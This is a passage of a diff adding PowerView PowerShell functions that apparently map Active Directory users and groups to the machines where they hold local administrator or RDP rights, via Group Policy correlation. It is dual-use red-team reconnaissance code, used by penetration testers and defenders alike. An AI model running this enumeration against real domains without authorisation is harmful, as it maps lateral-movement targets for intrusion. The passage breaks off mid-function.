($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + Get-DomainGPO @SearcherArguments | ForEach-Object { + $GPOdisplayName = $_.displayname + $GPOname = $_.name + $GPOPath = $_.gpcfilesyspath + + $ParseArgs = @{ 'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" } + if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential } + + # first parse the 'Restricted Groups' file (GptTmpl.inf) if it exists + $Inf = Get-GptTmpl @ParseArgs + + if ($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) { + $Memberships = @{} + + # parse the members/memberof fields for each entry + ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) { + $Group, $Relation = $Membership.Key.Split('__', $SplitOption) | ForEach-Object {$_.Trim()} + # extract out ALL members + $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_} + + if ($PSBoundParameters['ResolveMembersToSIDs']) { + # if the resulting member is username and not a SID, attempt to resolve it + $GroupMembers = @() + ForEach ($Member in $MembershipValue) { + if ($Member -and ($Member.Trim() -ne '')) { + if ($Member -notmatch '^S-1-.*') { + $ConvertToArguments = @{'ObjectName' = $Member} + if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain } + $MemberSID = ConvertTo-SID @ConvertToArguments + + if ($MemberSID) { + $GroupMembers += $MemberSID + } + else { + $GroupMembers += $Member + } + } + else { + $GroupMembers += $Member + } + } + } + $MembershipValue = $GroupMembers + } + + if (-not $Memberships[$Group]) { + $Memberships[$Group] = @{} + } + if ($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)} + $Memberships[$Group].Add($Relation, $MembershipValue) + } + + ForEach ($Membership in $Memberships.GetEnumerator()) { + if ($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) { + # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name + $GroupSID = $Membership.Key.Trim('*') + if ($GroupSID -and ($GroupSID.Trim() -ne '')) { + $GroupName = ConvertFrom-SID -ObjectSID $GroupSID @ConvertArguments + } + else { + $GroupName = $False + } + } + else { + $GroupName = $Membership.Key + + if ($GroupName -and ($GroupName.Trim() -ne '')) { + if ($Groupname -match 'Administrators') { + $GroupSID = 'S-1-5-32-544' + } + elseif ($Groupname -match 'Remote Desktop') { + $GroupSID = 'S-1-5-32-555' + } + elseif ($Groupname -match 'Guests') { + $GroupSID = 'S-1-5-32-546' + } + elseif ($GroupName.Trim() -ne '') { + $ConvertToArguments = @{'ObjectName' = $Groupname} + if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain } + $GroupSID = ConvertTo-SID @ConvertToArguments + } + else { + $GroupSID = $Null + } + } + } + + $GPOGroup = New-Object PSObject + $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName + $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName + $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath + $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups' + $GPOGroup | Add-Member Noteproperty 'Filters' $Null + $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName + $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID + $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof + $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members + $GPOGroup.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup') + $GPOGroup + } + } + + # now try to the parse group policy preferences file (Groups.xml) if it exists + $ParseArgs = @{ + 'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml" + } + + Get-GroupsXML @ParseArgs | ForEach-Object { + if ($PSBoundParameters['ResolveMembersToSIDs']) { + $GroupMembers = @() + ForEach ($Member in $_.GroupMembers) { + if ($Member -and ($Member.Trim() -ne '')) { + if ($Member -notmatch '^S-1-.*') { + + # if the resulting member is username and not a SID, attempt to resolve it + $ConvertToArguments = @{'ObjectName' = $Groupname} + if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain } + $MemberSID = ConvertTo-SID -Domain $Domain -ObjectName $Member + + if ($MemberSID) { + $GroupMembers += $MemberSID + } + else { + $GroupMembers += $Member + } + } + else { + $GroupMembers += $Member + } + } + } + $_.GroupMembers = $GroupMembers + } + + $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName + $_ | Add-Member Noteproperty 'GPOName' $GPOName + $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences' + $_.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup') + $_ + } + } + } +} + + +function Get-DomainGPOUserLocalGroupMapping { +<# +.SYNOPSIS + +Enumerates the machines where a specific domain user/group is a member of a specific +local group, all through GPO correlation. If no user/group is specified, all +discoverable mappings are returned. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup + +.DESCRIPTION + +Takes a user/group name and optional domain, and determines the computers in the domain +the user/group has local admin (or RDP) rights to. + +It does this by: + 1. resolving the user/group to its proper SID + 2. enumerating all groups the user/group is a current part of + and extracting all target SIDs to build a target SID list + 3. pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling + Get-DomainGPOLocalGroup + 4. matching the target SID list to the queried GPO SID list + to enumerate all GPO the user is effectively applied with + 5. enumerating all OUs and sites and applicable GPO GUIs are + applied to through gplink enumerating + 6. querying for all computers under the given OUs or sites + +If no user/group is specified, all user/group -> machine mappings discovered through +GPO relationships are returned. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the user/group to identity GPO local group mappings for. + +.PARAMETER LocalGroup + +The local group to check access against. +Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), +or a custom local SID. Defaults to local 'Administrators'. + +.PARAMETER Domain + +Specifies the domain to enumerate GPOs for, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainGPOUserLocalGroupMapping + +Find all user/group -> machine relationships where the user/group is a member +of the local administrators group on target machines. + +.EXAMPLE + +Get-DomainGPOUserLocalGroupMapping -Identity dfm -Domain dev.testlab.local + +Find all computers that dfm user has local administrator rights to in +the dev.testlab.local domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOUserLocalGroupMapping -Credential $Cred + +.OUTPUTS + +PowerView.GPOLocalGroupMapping + +A custom PSObject containing any target identity information and what local +group memberships they're a part of through GPO correlation. + +.LINK + +http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.GPOUserLocalGroupMapping')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String] + $Identity, + + [String] + [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')] + $LocalGroup = 'Administrators', + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $CommonArguments = @{} + if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential } + } + + PROCESS { + $TargetSIDs = @() + + if ($PSBoundParameters['Identity']) { + $TargetSIDs += Get-DomainObject @CommonArguments -Identity $Identity | Select-Object -Expand objectsid + $TargetObjectSID = $TargetSIDs + if (-not $TargetSIDs) { + Throw "[Get-DomainGPOUserLocalGroupMapping] Unable to retrieve SID for identity '$Identity'" + } + } + else { + # no filtering/match all + $TargetSIDs = @('*') + } + + if ($LocalGroup -match 'S-1-5') { + $TargetLocalSID = $LocalGroup + } + elseif ($LocalGroup -match 'Admin') { + $TargetLocalSID = 'S-1-5-32-544' + } + else { + # RDP + $TargetLocalSID = 'S-1-5-32-555' + } + + if ($TargetSIDs[0] -ne '*') { + ForEach ($TargetSid in $TargetSids) { + Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Enumerating nested group memberships for: '$TargetSid'" + $TargetSIDs += Get-DomainGroup @CommonArguments -Properties 'objectsid' -MemberIdentity $TargetSid | Select-Object -ExpandProperty objectsid + } + } + + Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Target localgroup SID: $TargetLocalSID" + Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Effective target domain SIDs: $TargetSIDs" + + $GPOgroups = Get-DomainGPOLocalGroup @CommonArguments -ResolveMembersToSIDs | ForEach-Object { + $GPOgroup = $_ + # if the locally set group is what we're looking for, check the GroupMembers ('members') for our target SID + if ($GPOgroup.GroupSID -match $TargetLocalSID) { + $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object { + if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) { + $GPOgroup + } + } + } + # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs + if ( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) { + if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) { + $GPOgroup + } + } + } | Sort-Object -Property GPOName -Unique + + $GPOgroups | Where-Object {$_} | ForEach-Object { + $GPOname = $_.GPODisplayName + $GPOguid = $_.GPOName + $GPOPath = $_.GPOPath + $GPOType = $_.GPOType + if ($_.GroupMembers) { + $GPOMembers = $_.GroupMembers + } + else { + $GPOMembers = $_.GroupSID + } + + $Filters = $_.Filters + + if ($TargetSIDs[0] -eq '*') { + # if the * wildcard was used, set the targets to all GPO members so everything it output + $TargetObjectSIDs = $GPOMembers + } + else { + $TargetObjectSIDs = $TargetObjectSID + } + + # find any OUs that have this GPO linked through gpLink + Get-DomainOU @CommonArguments -Raw -Properties 'name,distinguishedname' -GPLink $GPOGuid | ForEach-Object { + if ($Filters) { + $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname,distinguishedname' -SearchBase $_.Path | Where-Object {$_.distinguishedname -match ($Filters.Value)} | Select-Object -ExpandProperty dnshostname + } + else { + $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname' -SearchBase $_.Path | Select-Object -ExpandProperty dnshostname + } + + if ($OUComputers) { + if ($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)} + + ForEach ($TargetSid in $TargetObjectSIDs) { + $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid' + + $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype + + $GPOLocalGroupMapping = New-Object PSObject + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid + $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain + $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType + $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.Properties.distinguishedname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $OUComputers + $GPOLocalGroupMapping.PSObject.TypeNames.Insert(0, 'PowerView.GPOLocalGroupMapping') + $GPOLocalGroupMapping + } + } + } + + # find any sites that have this GPO linked through gpLink + Get-DomainSite @CommonArguments -Properties 'siteobjectbl,distinguishedname' -GPLink $GPOGuid | ForEach-Object { + ForEach ($TargetSid in $TargetObjectSIDs) { + $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid' + + $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype + + $GPOLocalGroupMapping = New-Object PSObject + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid + $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup + $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath + $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType + $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.distinguishedname + $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl + $GPOLocalGroupMapping.PSObject.TypeNames.Add('PowerView.GPOLocalGroupMapping') + $GPOLocalGroupMapping + } + } + } + } +} + + +function Get-DomainGPOComputerLocalGroupMapping { +<# +.SYNOPSIS + +Takes a computer (or GPO) object and determines what users/groups are in the specified +local group for the machine through GPO correlation. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup + +.DESCRIPTION + +This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups +are in the specified local group for a target machine through GPO correlation. + +If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to +determine the OU the computer is a part of. Then resolve the computer's site name with +Get-NetComputerSiteName and retrieve all sites object Get-DomainSite. For those results, attempt to +enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. For +each resulting GPO group, resolve the resulting user/group name to a full AD object and +return the results. This will return the domain objects that are members of the specified +-LocalGroup for the given computer. + +Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and +localgroup specifications. + +.PARAMETER ComputerIdentity + +A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. windows10.testlab.local) for the computer to identity GPO local group mappings for. + +.PARAMETER OUIdentity + +An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for. + +.PARAMETER LocalGroup + +The local group to check access against. +Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), +or a custom local SID. Defaults to local 'Administrators'. + +.PARAMETER Domain + +Specifies the domain to enumerate GPOs for, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local + +Finds users who have local admin rights over WINDOWS3 through GPO correlation. + +.EXAMPLE + +Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP + +Finds users who have RDP rights over WINDOWS4 through GPO correlation. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local + +.OUTPUTS + +PowerView.GGPOComputerLocalGroupMember +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.GGPOComputerLocalGroupMember')] + [CmdletBinding(DefaultParameterSetName = 'ComputerIdentity')] + Param( + [Parameter(Position = 0, ParameterSetName = 'ComputerIdentity', Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('ComputerName', 'Computer', 'DistinguishedName', 'SamAccountName', 'Name')] + [String] + $ComputerIdentity, + + [Parameter(Mandatory = $True, ParameterSetName = 'OUIdentity')] + [Alias('OU')] + [String] + $OUIdentity, + + [String] + [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')] + $LocalGroup = 'Administrators', + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $CommonArguments = @{} + if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['ComputerIdentity']) { + $Computers = Get-DomainComputer @CommonArguments -Identity $ComputerIdentity -Properties 'distinguishedname,dnshostname' + + if (-not $Computers) { + throw "[Get-DomainGPOComputerLocalGroupMapping] Computer $ComputerIdentity not found. Try a fully qualified host name." + } + + ForEach ($Computer in $Computers) { + + $GPOGuids = @() + + # extract any GPOs linked to this computer's OU through gpLink + $DN = $Computer.distinguishedname + $OUIndex = $DN.IndexOf('OU=') + if ($OUIndex -gt 0) { + $OUName = $DN.SubString($OUIndex) + } + if ($OUName) { + $GPOGuids += Get-DomainOU @CommonArguments -SearchBase $OUName -LDAPFilter '(gplink=*)' | ForEach-Object { + Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value } + } + } + + # extract any GPOs linked to this computer's site through gpLink + Write-Verbose "Enumerating the sitename for: $($Computer.dnshostname)" + $ComputerSite = (Get-NetComputerSiteName -ComputerName $Computer.dnshostname).SiteName + if ($ComputerSite -and ($ComputerSite -notmatch 'Error')) { + $GPOGuids += Get-DomainSite @CommonArguments -Identity $ComputerSite -LDAPFilter '(gplink=*)' | ForEach-Object { + Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value } + } + } + + # process any GPO local group settings from the GPO GUID set + $GPOGuids | Get-DomainGPOLocalGroup @CommonArguments | Sort-Object -Property GPOName -Unique | ForEach-Object { + $GPOGroup = $_ + + if($GPOGroup.GroupMembers) { + $GPOMembers = $GPOGroup.GroupMembers + } + else { + $GPOMembers = $GPOGroup.GroupSID + } + + $GPOMembers | ForEach-Object { + $Object = Get-DomainObject @CommonArguments -Identity $_ + $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype + + $GPOComputerLocalGroupMember = New-Object PSObject + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ComputerName' $Computer.dnshostname + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectName' $Object.samaccountname + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectSID' $_ + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType + $GPOComputerLocalGroupMember.PSObject.TypeNames.Add('PowerView.GPOComputerLocalGroupMember') + $GPOComputerLocalGroupMember + } + } + } + } + } +} + + +function Get-DomainPolicyData { +<# +.SYNOPSIS + +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID + +.DESCRIPTION + +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller using Get-DomainGPO. + +.PARAMETER Domain + +The domain to query for default policies, defaults to the current domain. + +.PARAMETER Policy + +Extract 'Domain', 'DC' (domain controller) policies, or 'All' for all policies. +Otherwise queries for the particular GPO name or GUID. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainPolicyData + +Returns the default domain policy for the current domain. + +.EXAMPLE + +Get-DomainPolicyData -Domain dev.testlab.local + +Returns the default domain policy for the dev.testlab.local domain. + +.EXAMPLE + +Get-DomainGPO | Get-DomainPolicy + +Parses any GptTmpl.infs found for any policies in the current domain. + +.EXAMPLE + +Get-DomainPolicyData -Policy DC -Domain dev.testlab.local + +Returns the policy for the dev.testlab.local domain controller. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainPolicyData -Credential $Cred + +.OUTPUTS + +Hashtable + +Ouputs a hashtable representing the parsed GptTmpl.inf file. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Source', 'Name')] + [String] + $Policy = 'Domain', + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $ConvertArguments = @{} + if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Domain']) { + $SearcherArguments['Domain'] = $Domain + $ConvertArguments['Domain'] = $Domain + } + + if ($Policy -eq 'All') { + $SearcherArguments['Identity'] = '*' + } + elseif ($Policy -eq 'Domain') { + $SearcherArguments['Identity'] = '{31B2F340-016D-11D2-945F-00C04FB984F9}' + } + elseif (($Policy -eq 'DomainController') -or ($Policy -eq 'DC')) { + $SearcherArguments['Identity'] = '{6AC1786C-016F-11D2-945F-00C04FB984F9}' + } + else { + $SearcherArguments['Identity'] = $Policy + } + + $GPOResults = Get-DomainGPO @SearcherArguments + + ForEach ($GPO in $GPOResults) { + # grab the GptTmpl.inf file and parse it + $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" + + $ParseArgs = @{ + 'GptTmplPath' = $GptTmplPath + 'OutputObject' = $True + } + if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential } + + # parse the GptTmpl.inf + Get-GptTmpl @ParseArgs | ForEach-Object { + $_ | Add-Member Noteproperty 'GPOName' $GPO.name + $_ | Add-Member Noteproperty 'GPODisplayName' $GPO.displayname + $_ + } + } + } +} + + +######################################################## +# +# Functions that enumerate a single host, either through +# WinNT, WMI, remote registry, or API calls +# (with PSReflect). +# +######################################################## + +function Get-NetLocalGroup { +<# +.SYNOPSIS + +Enumerates the local groups on the local (or remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +.DESCRIPTION + +This function will enumerate the names and descriptions for the +local groups on the current, or remote, machine. By default, the Win32 API +call NetLocalGroupEnum will be used (for speed). Specifying "-Method WinNT" +causes the WinNT service provider to be used instead, which returns group +SIDs along with the group names and descriptions/comments. + +.PARAMETER ComputerName + +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. + +.PARAMETER Method + +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to a remote machine. Only applicable with "-Method WinNT". + +.EXAMPLE + +Get-NetLocalGroup + +ComputerName GroupName Comment +------------ --------- ------- +WINDOWS1 Administrators Administrators have comple... +WINDOWS1 Backup Operators Backup Operators can overr... +WINDOWS1 Cryptographic Operators Members are authorized to ... +... + +.EXAMPLE + +Get-NetLocalGroup -Method Winnt + +ComputerName GroupName GroupSID Comment +------------ --------- -------- ------- +WINDOWS1 Administrators S-1-5-32-544 Administrators hav... +WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c... +WINDOWS1 Cryptographic Opera... S-1-5-32-569 Members are author... +... + +.EXAMPLE + +Get-NetLocalGroup -ComputerName primary.testlab.local + +ComputerName GroupName Comment +------------ --------- ------- +primary.testlab.local Administrators Administrators have comple... +primary.testlab.local Users Users are prevented from m... +primary.testlab.local Guests Guests have the same acces... +primary.testlab.local Print Operators Members can administer dom... +primary.testlab.local Backup Operators Backup Operators can overr... + +.OUTPUTS + +PowerView.LocalGroup.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroup.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +.LINK + +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LocalGroup.API')] + [OutputType('PowerView.LocalGroup.WinNT')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline 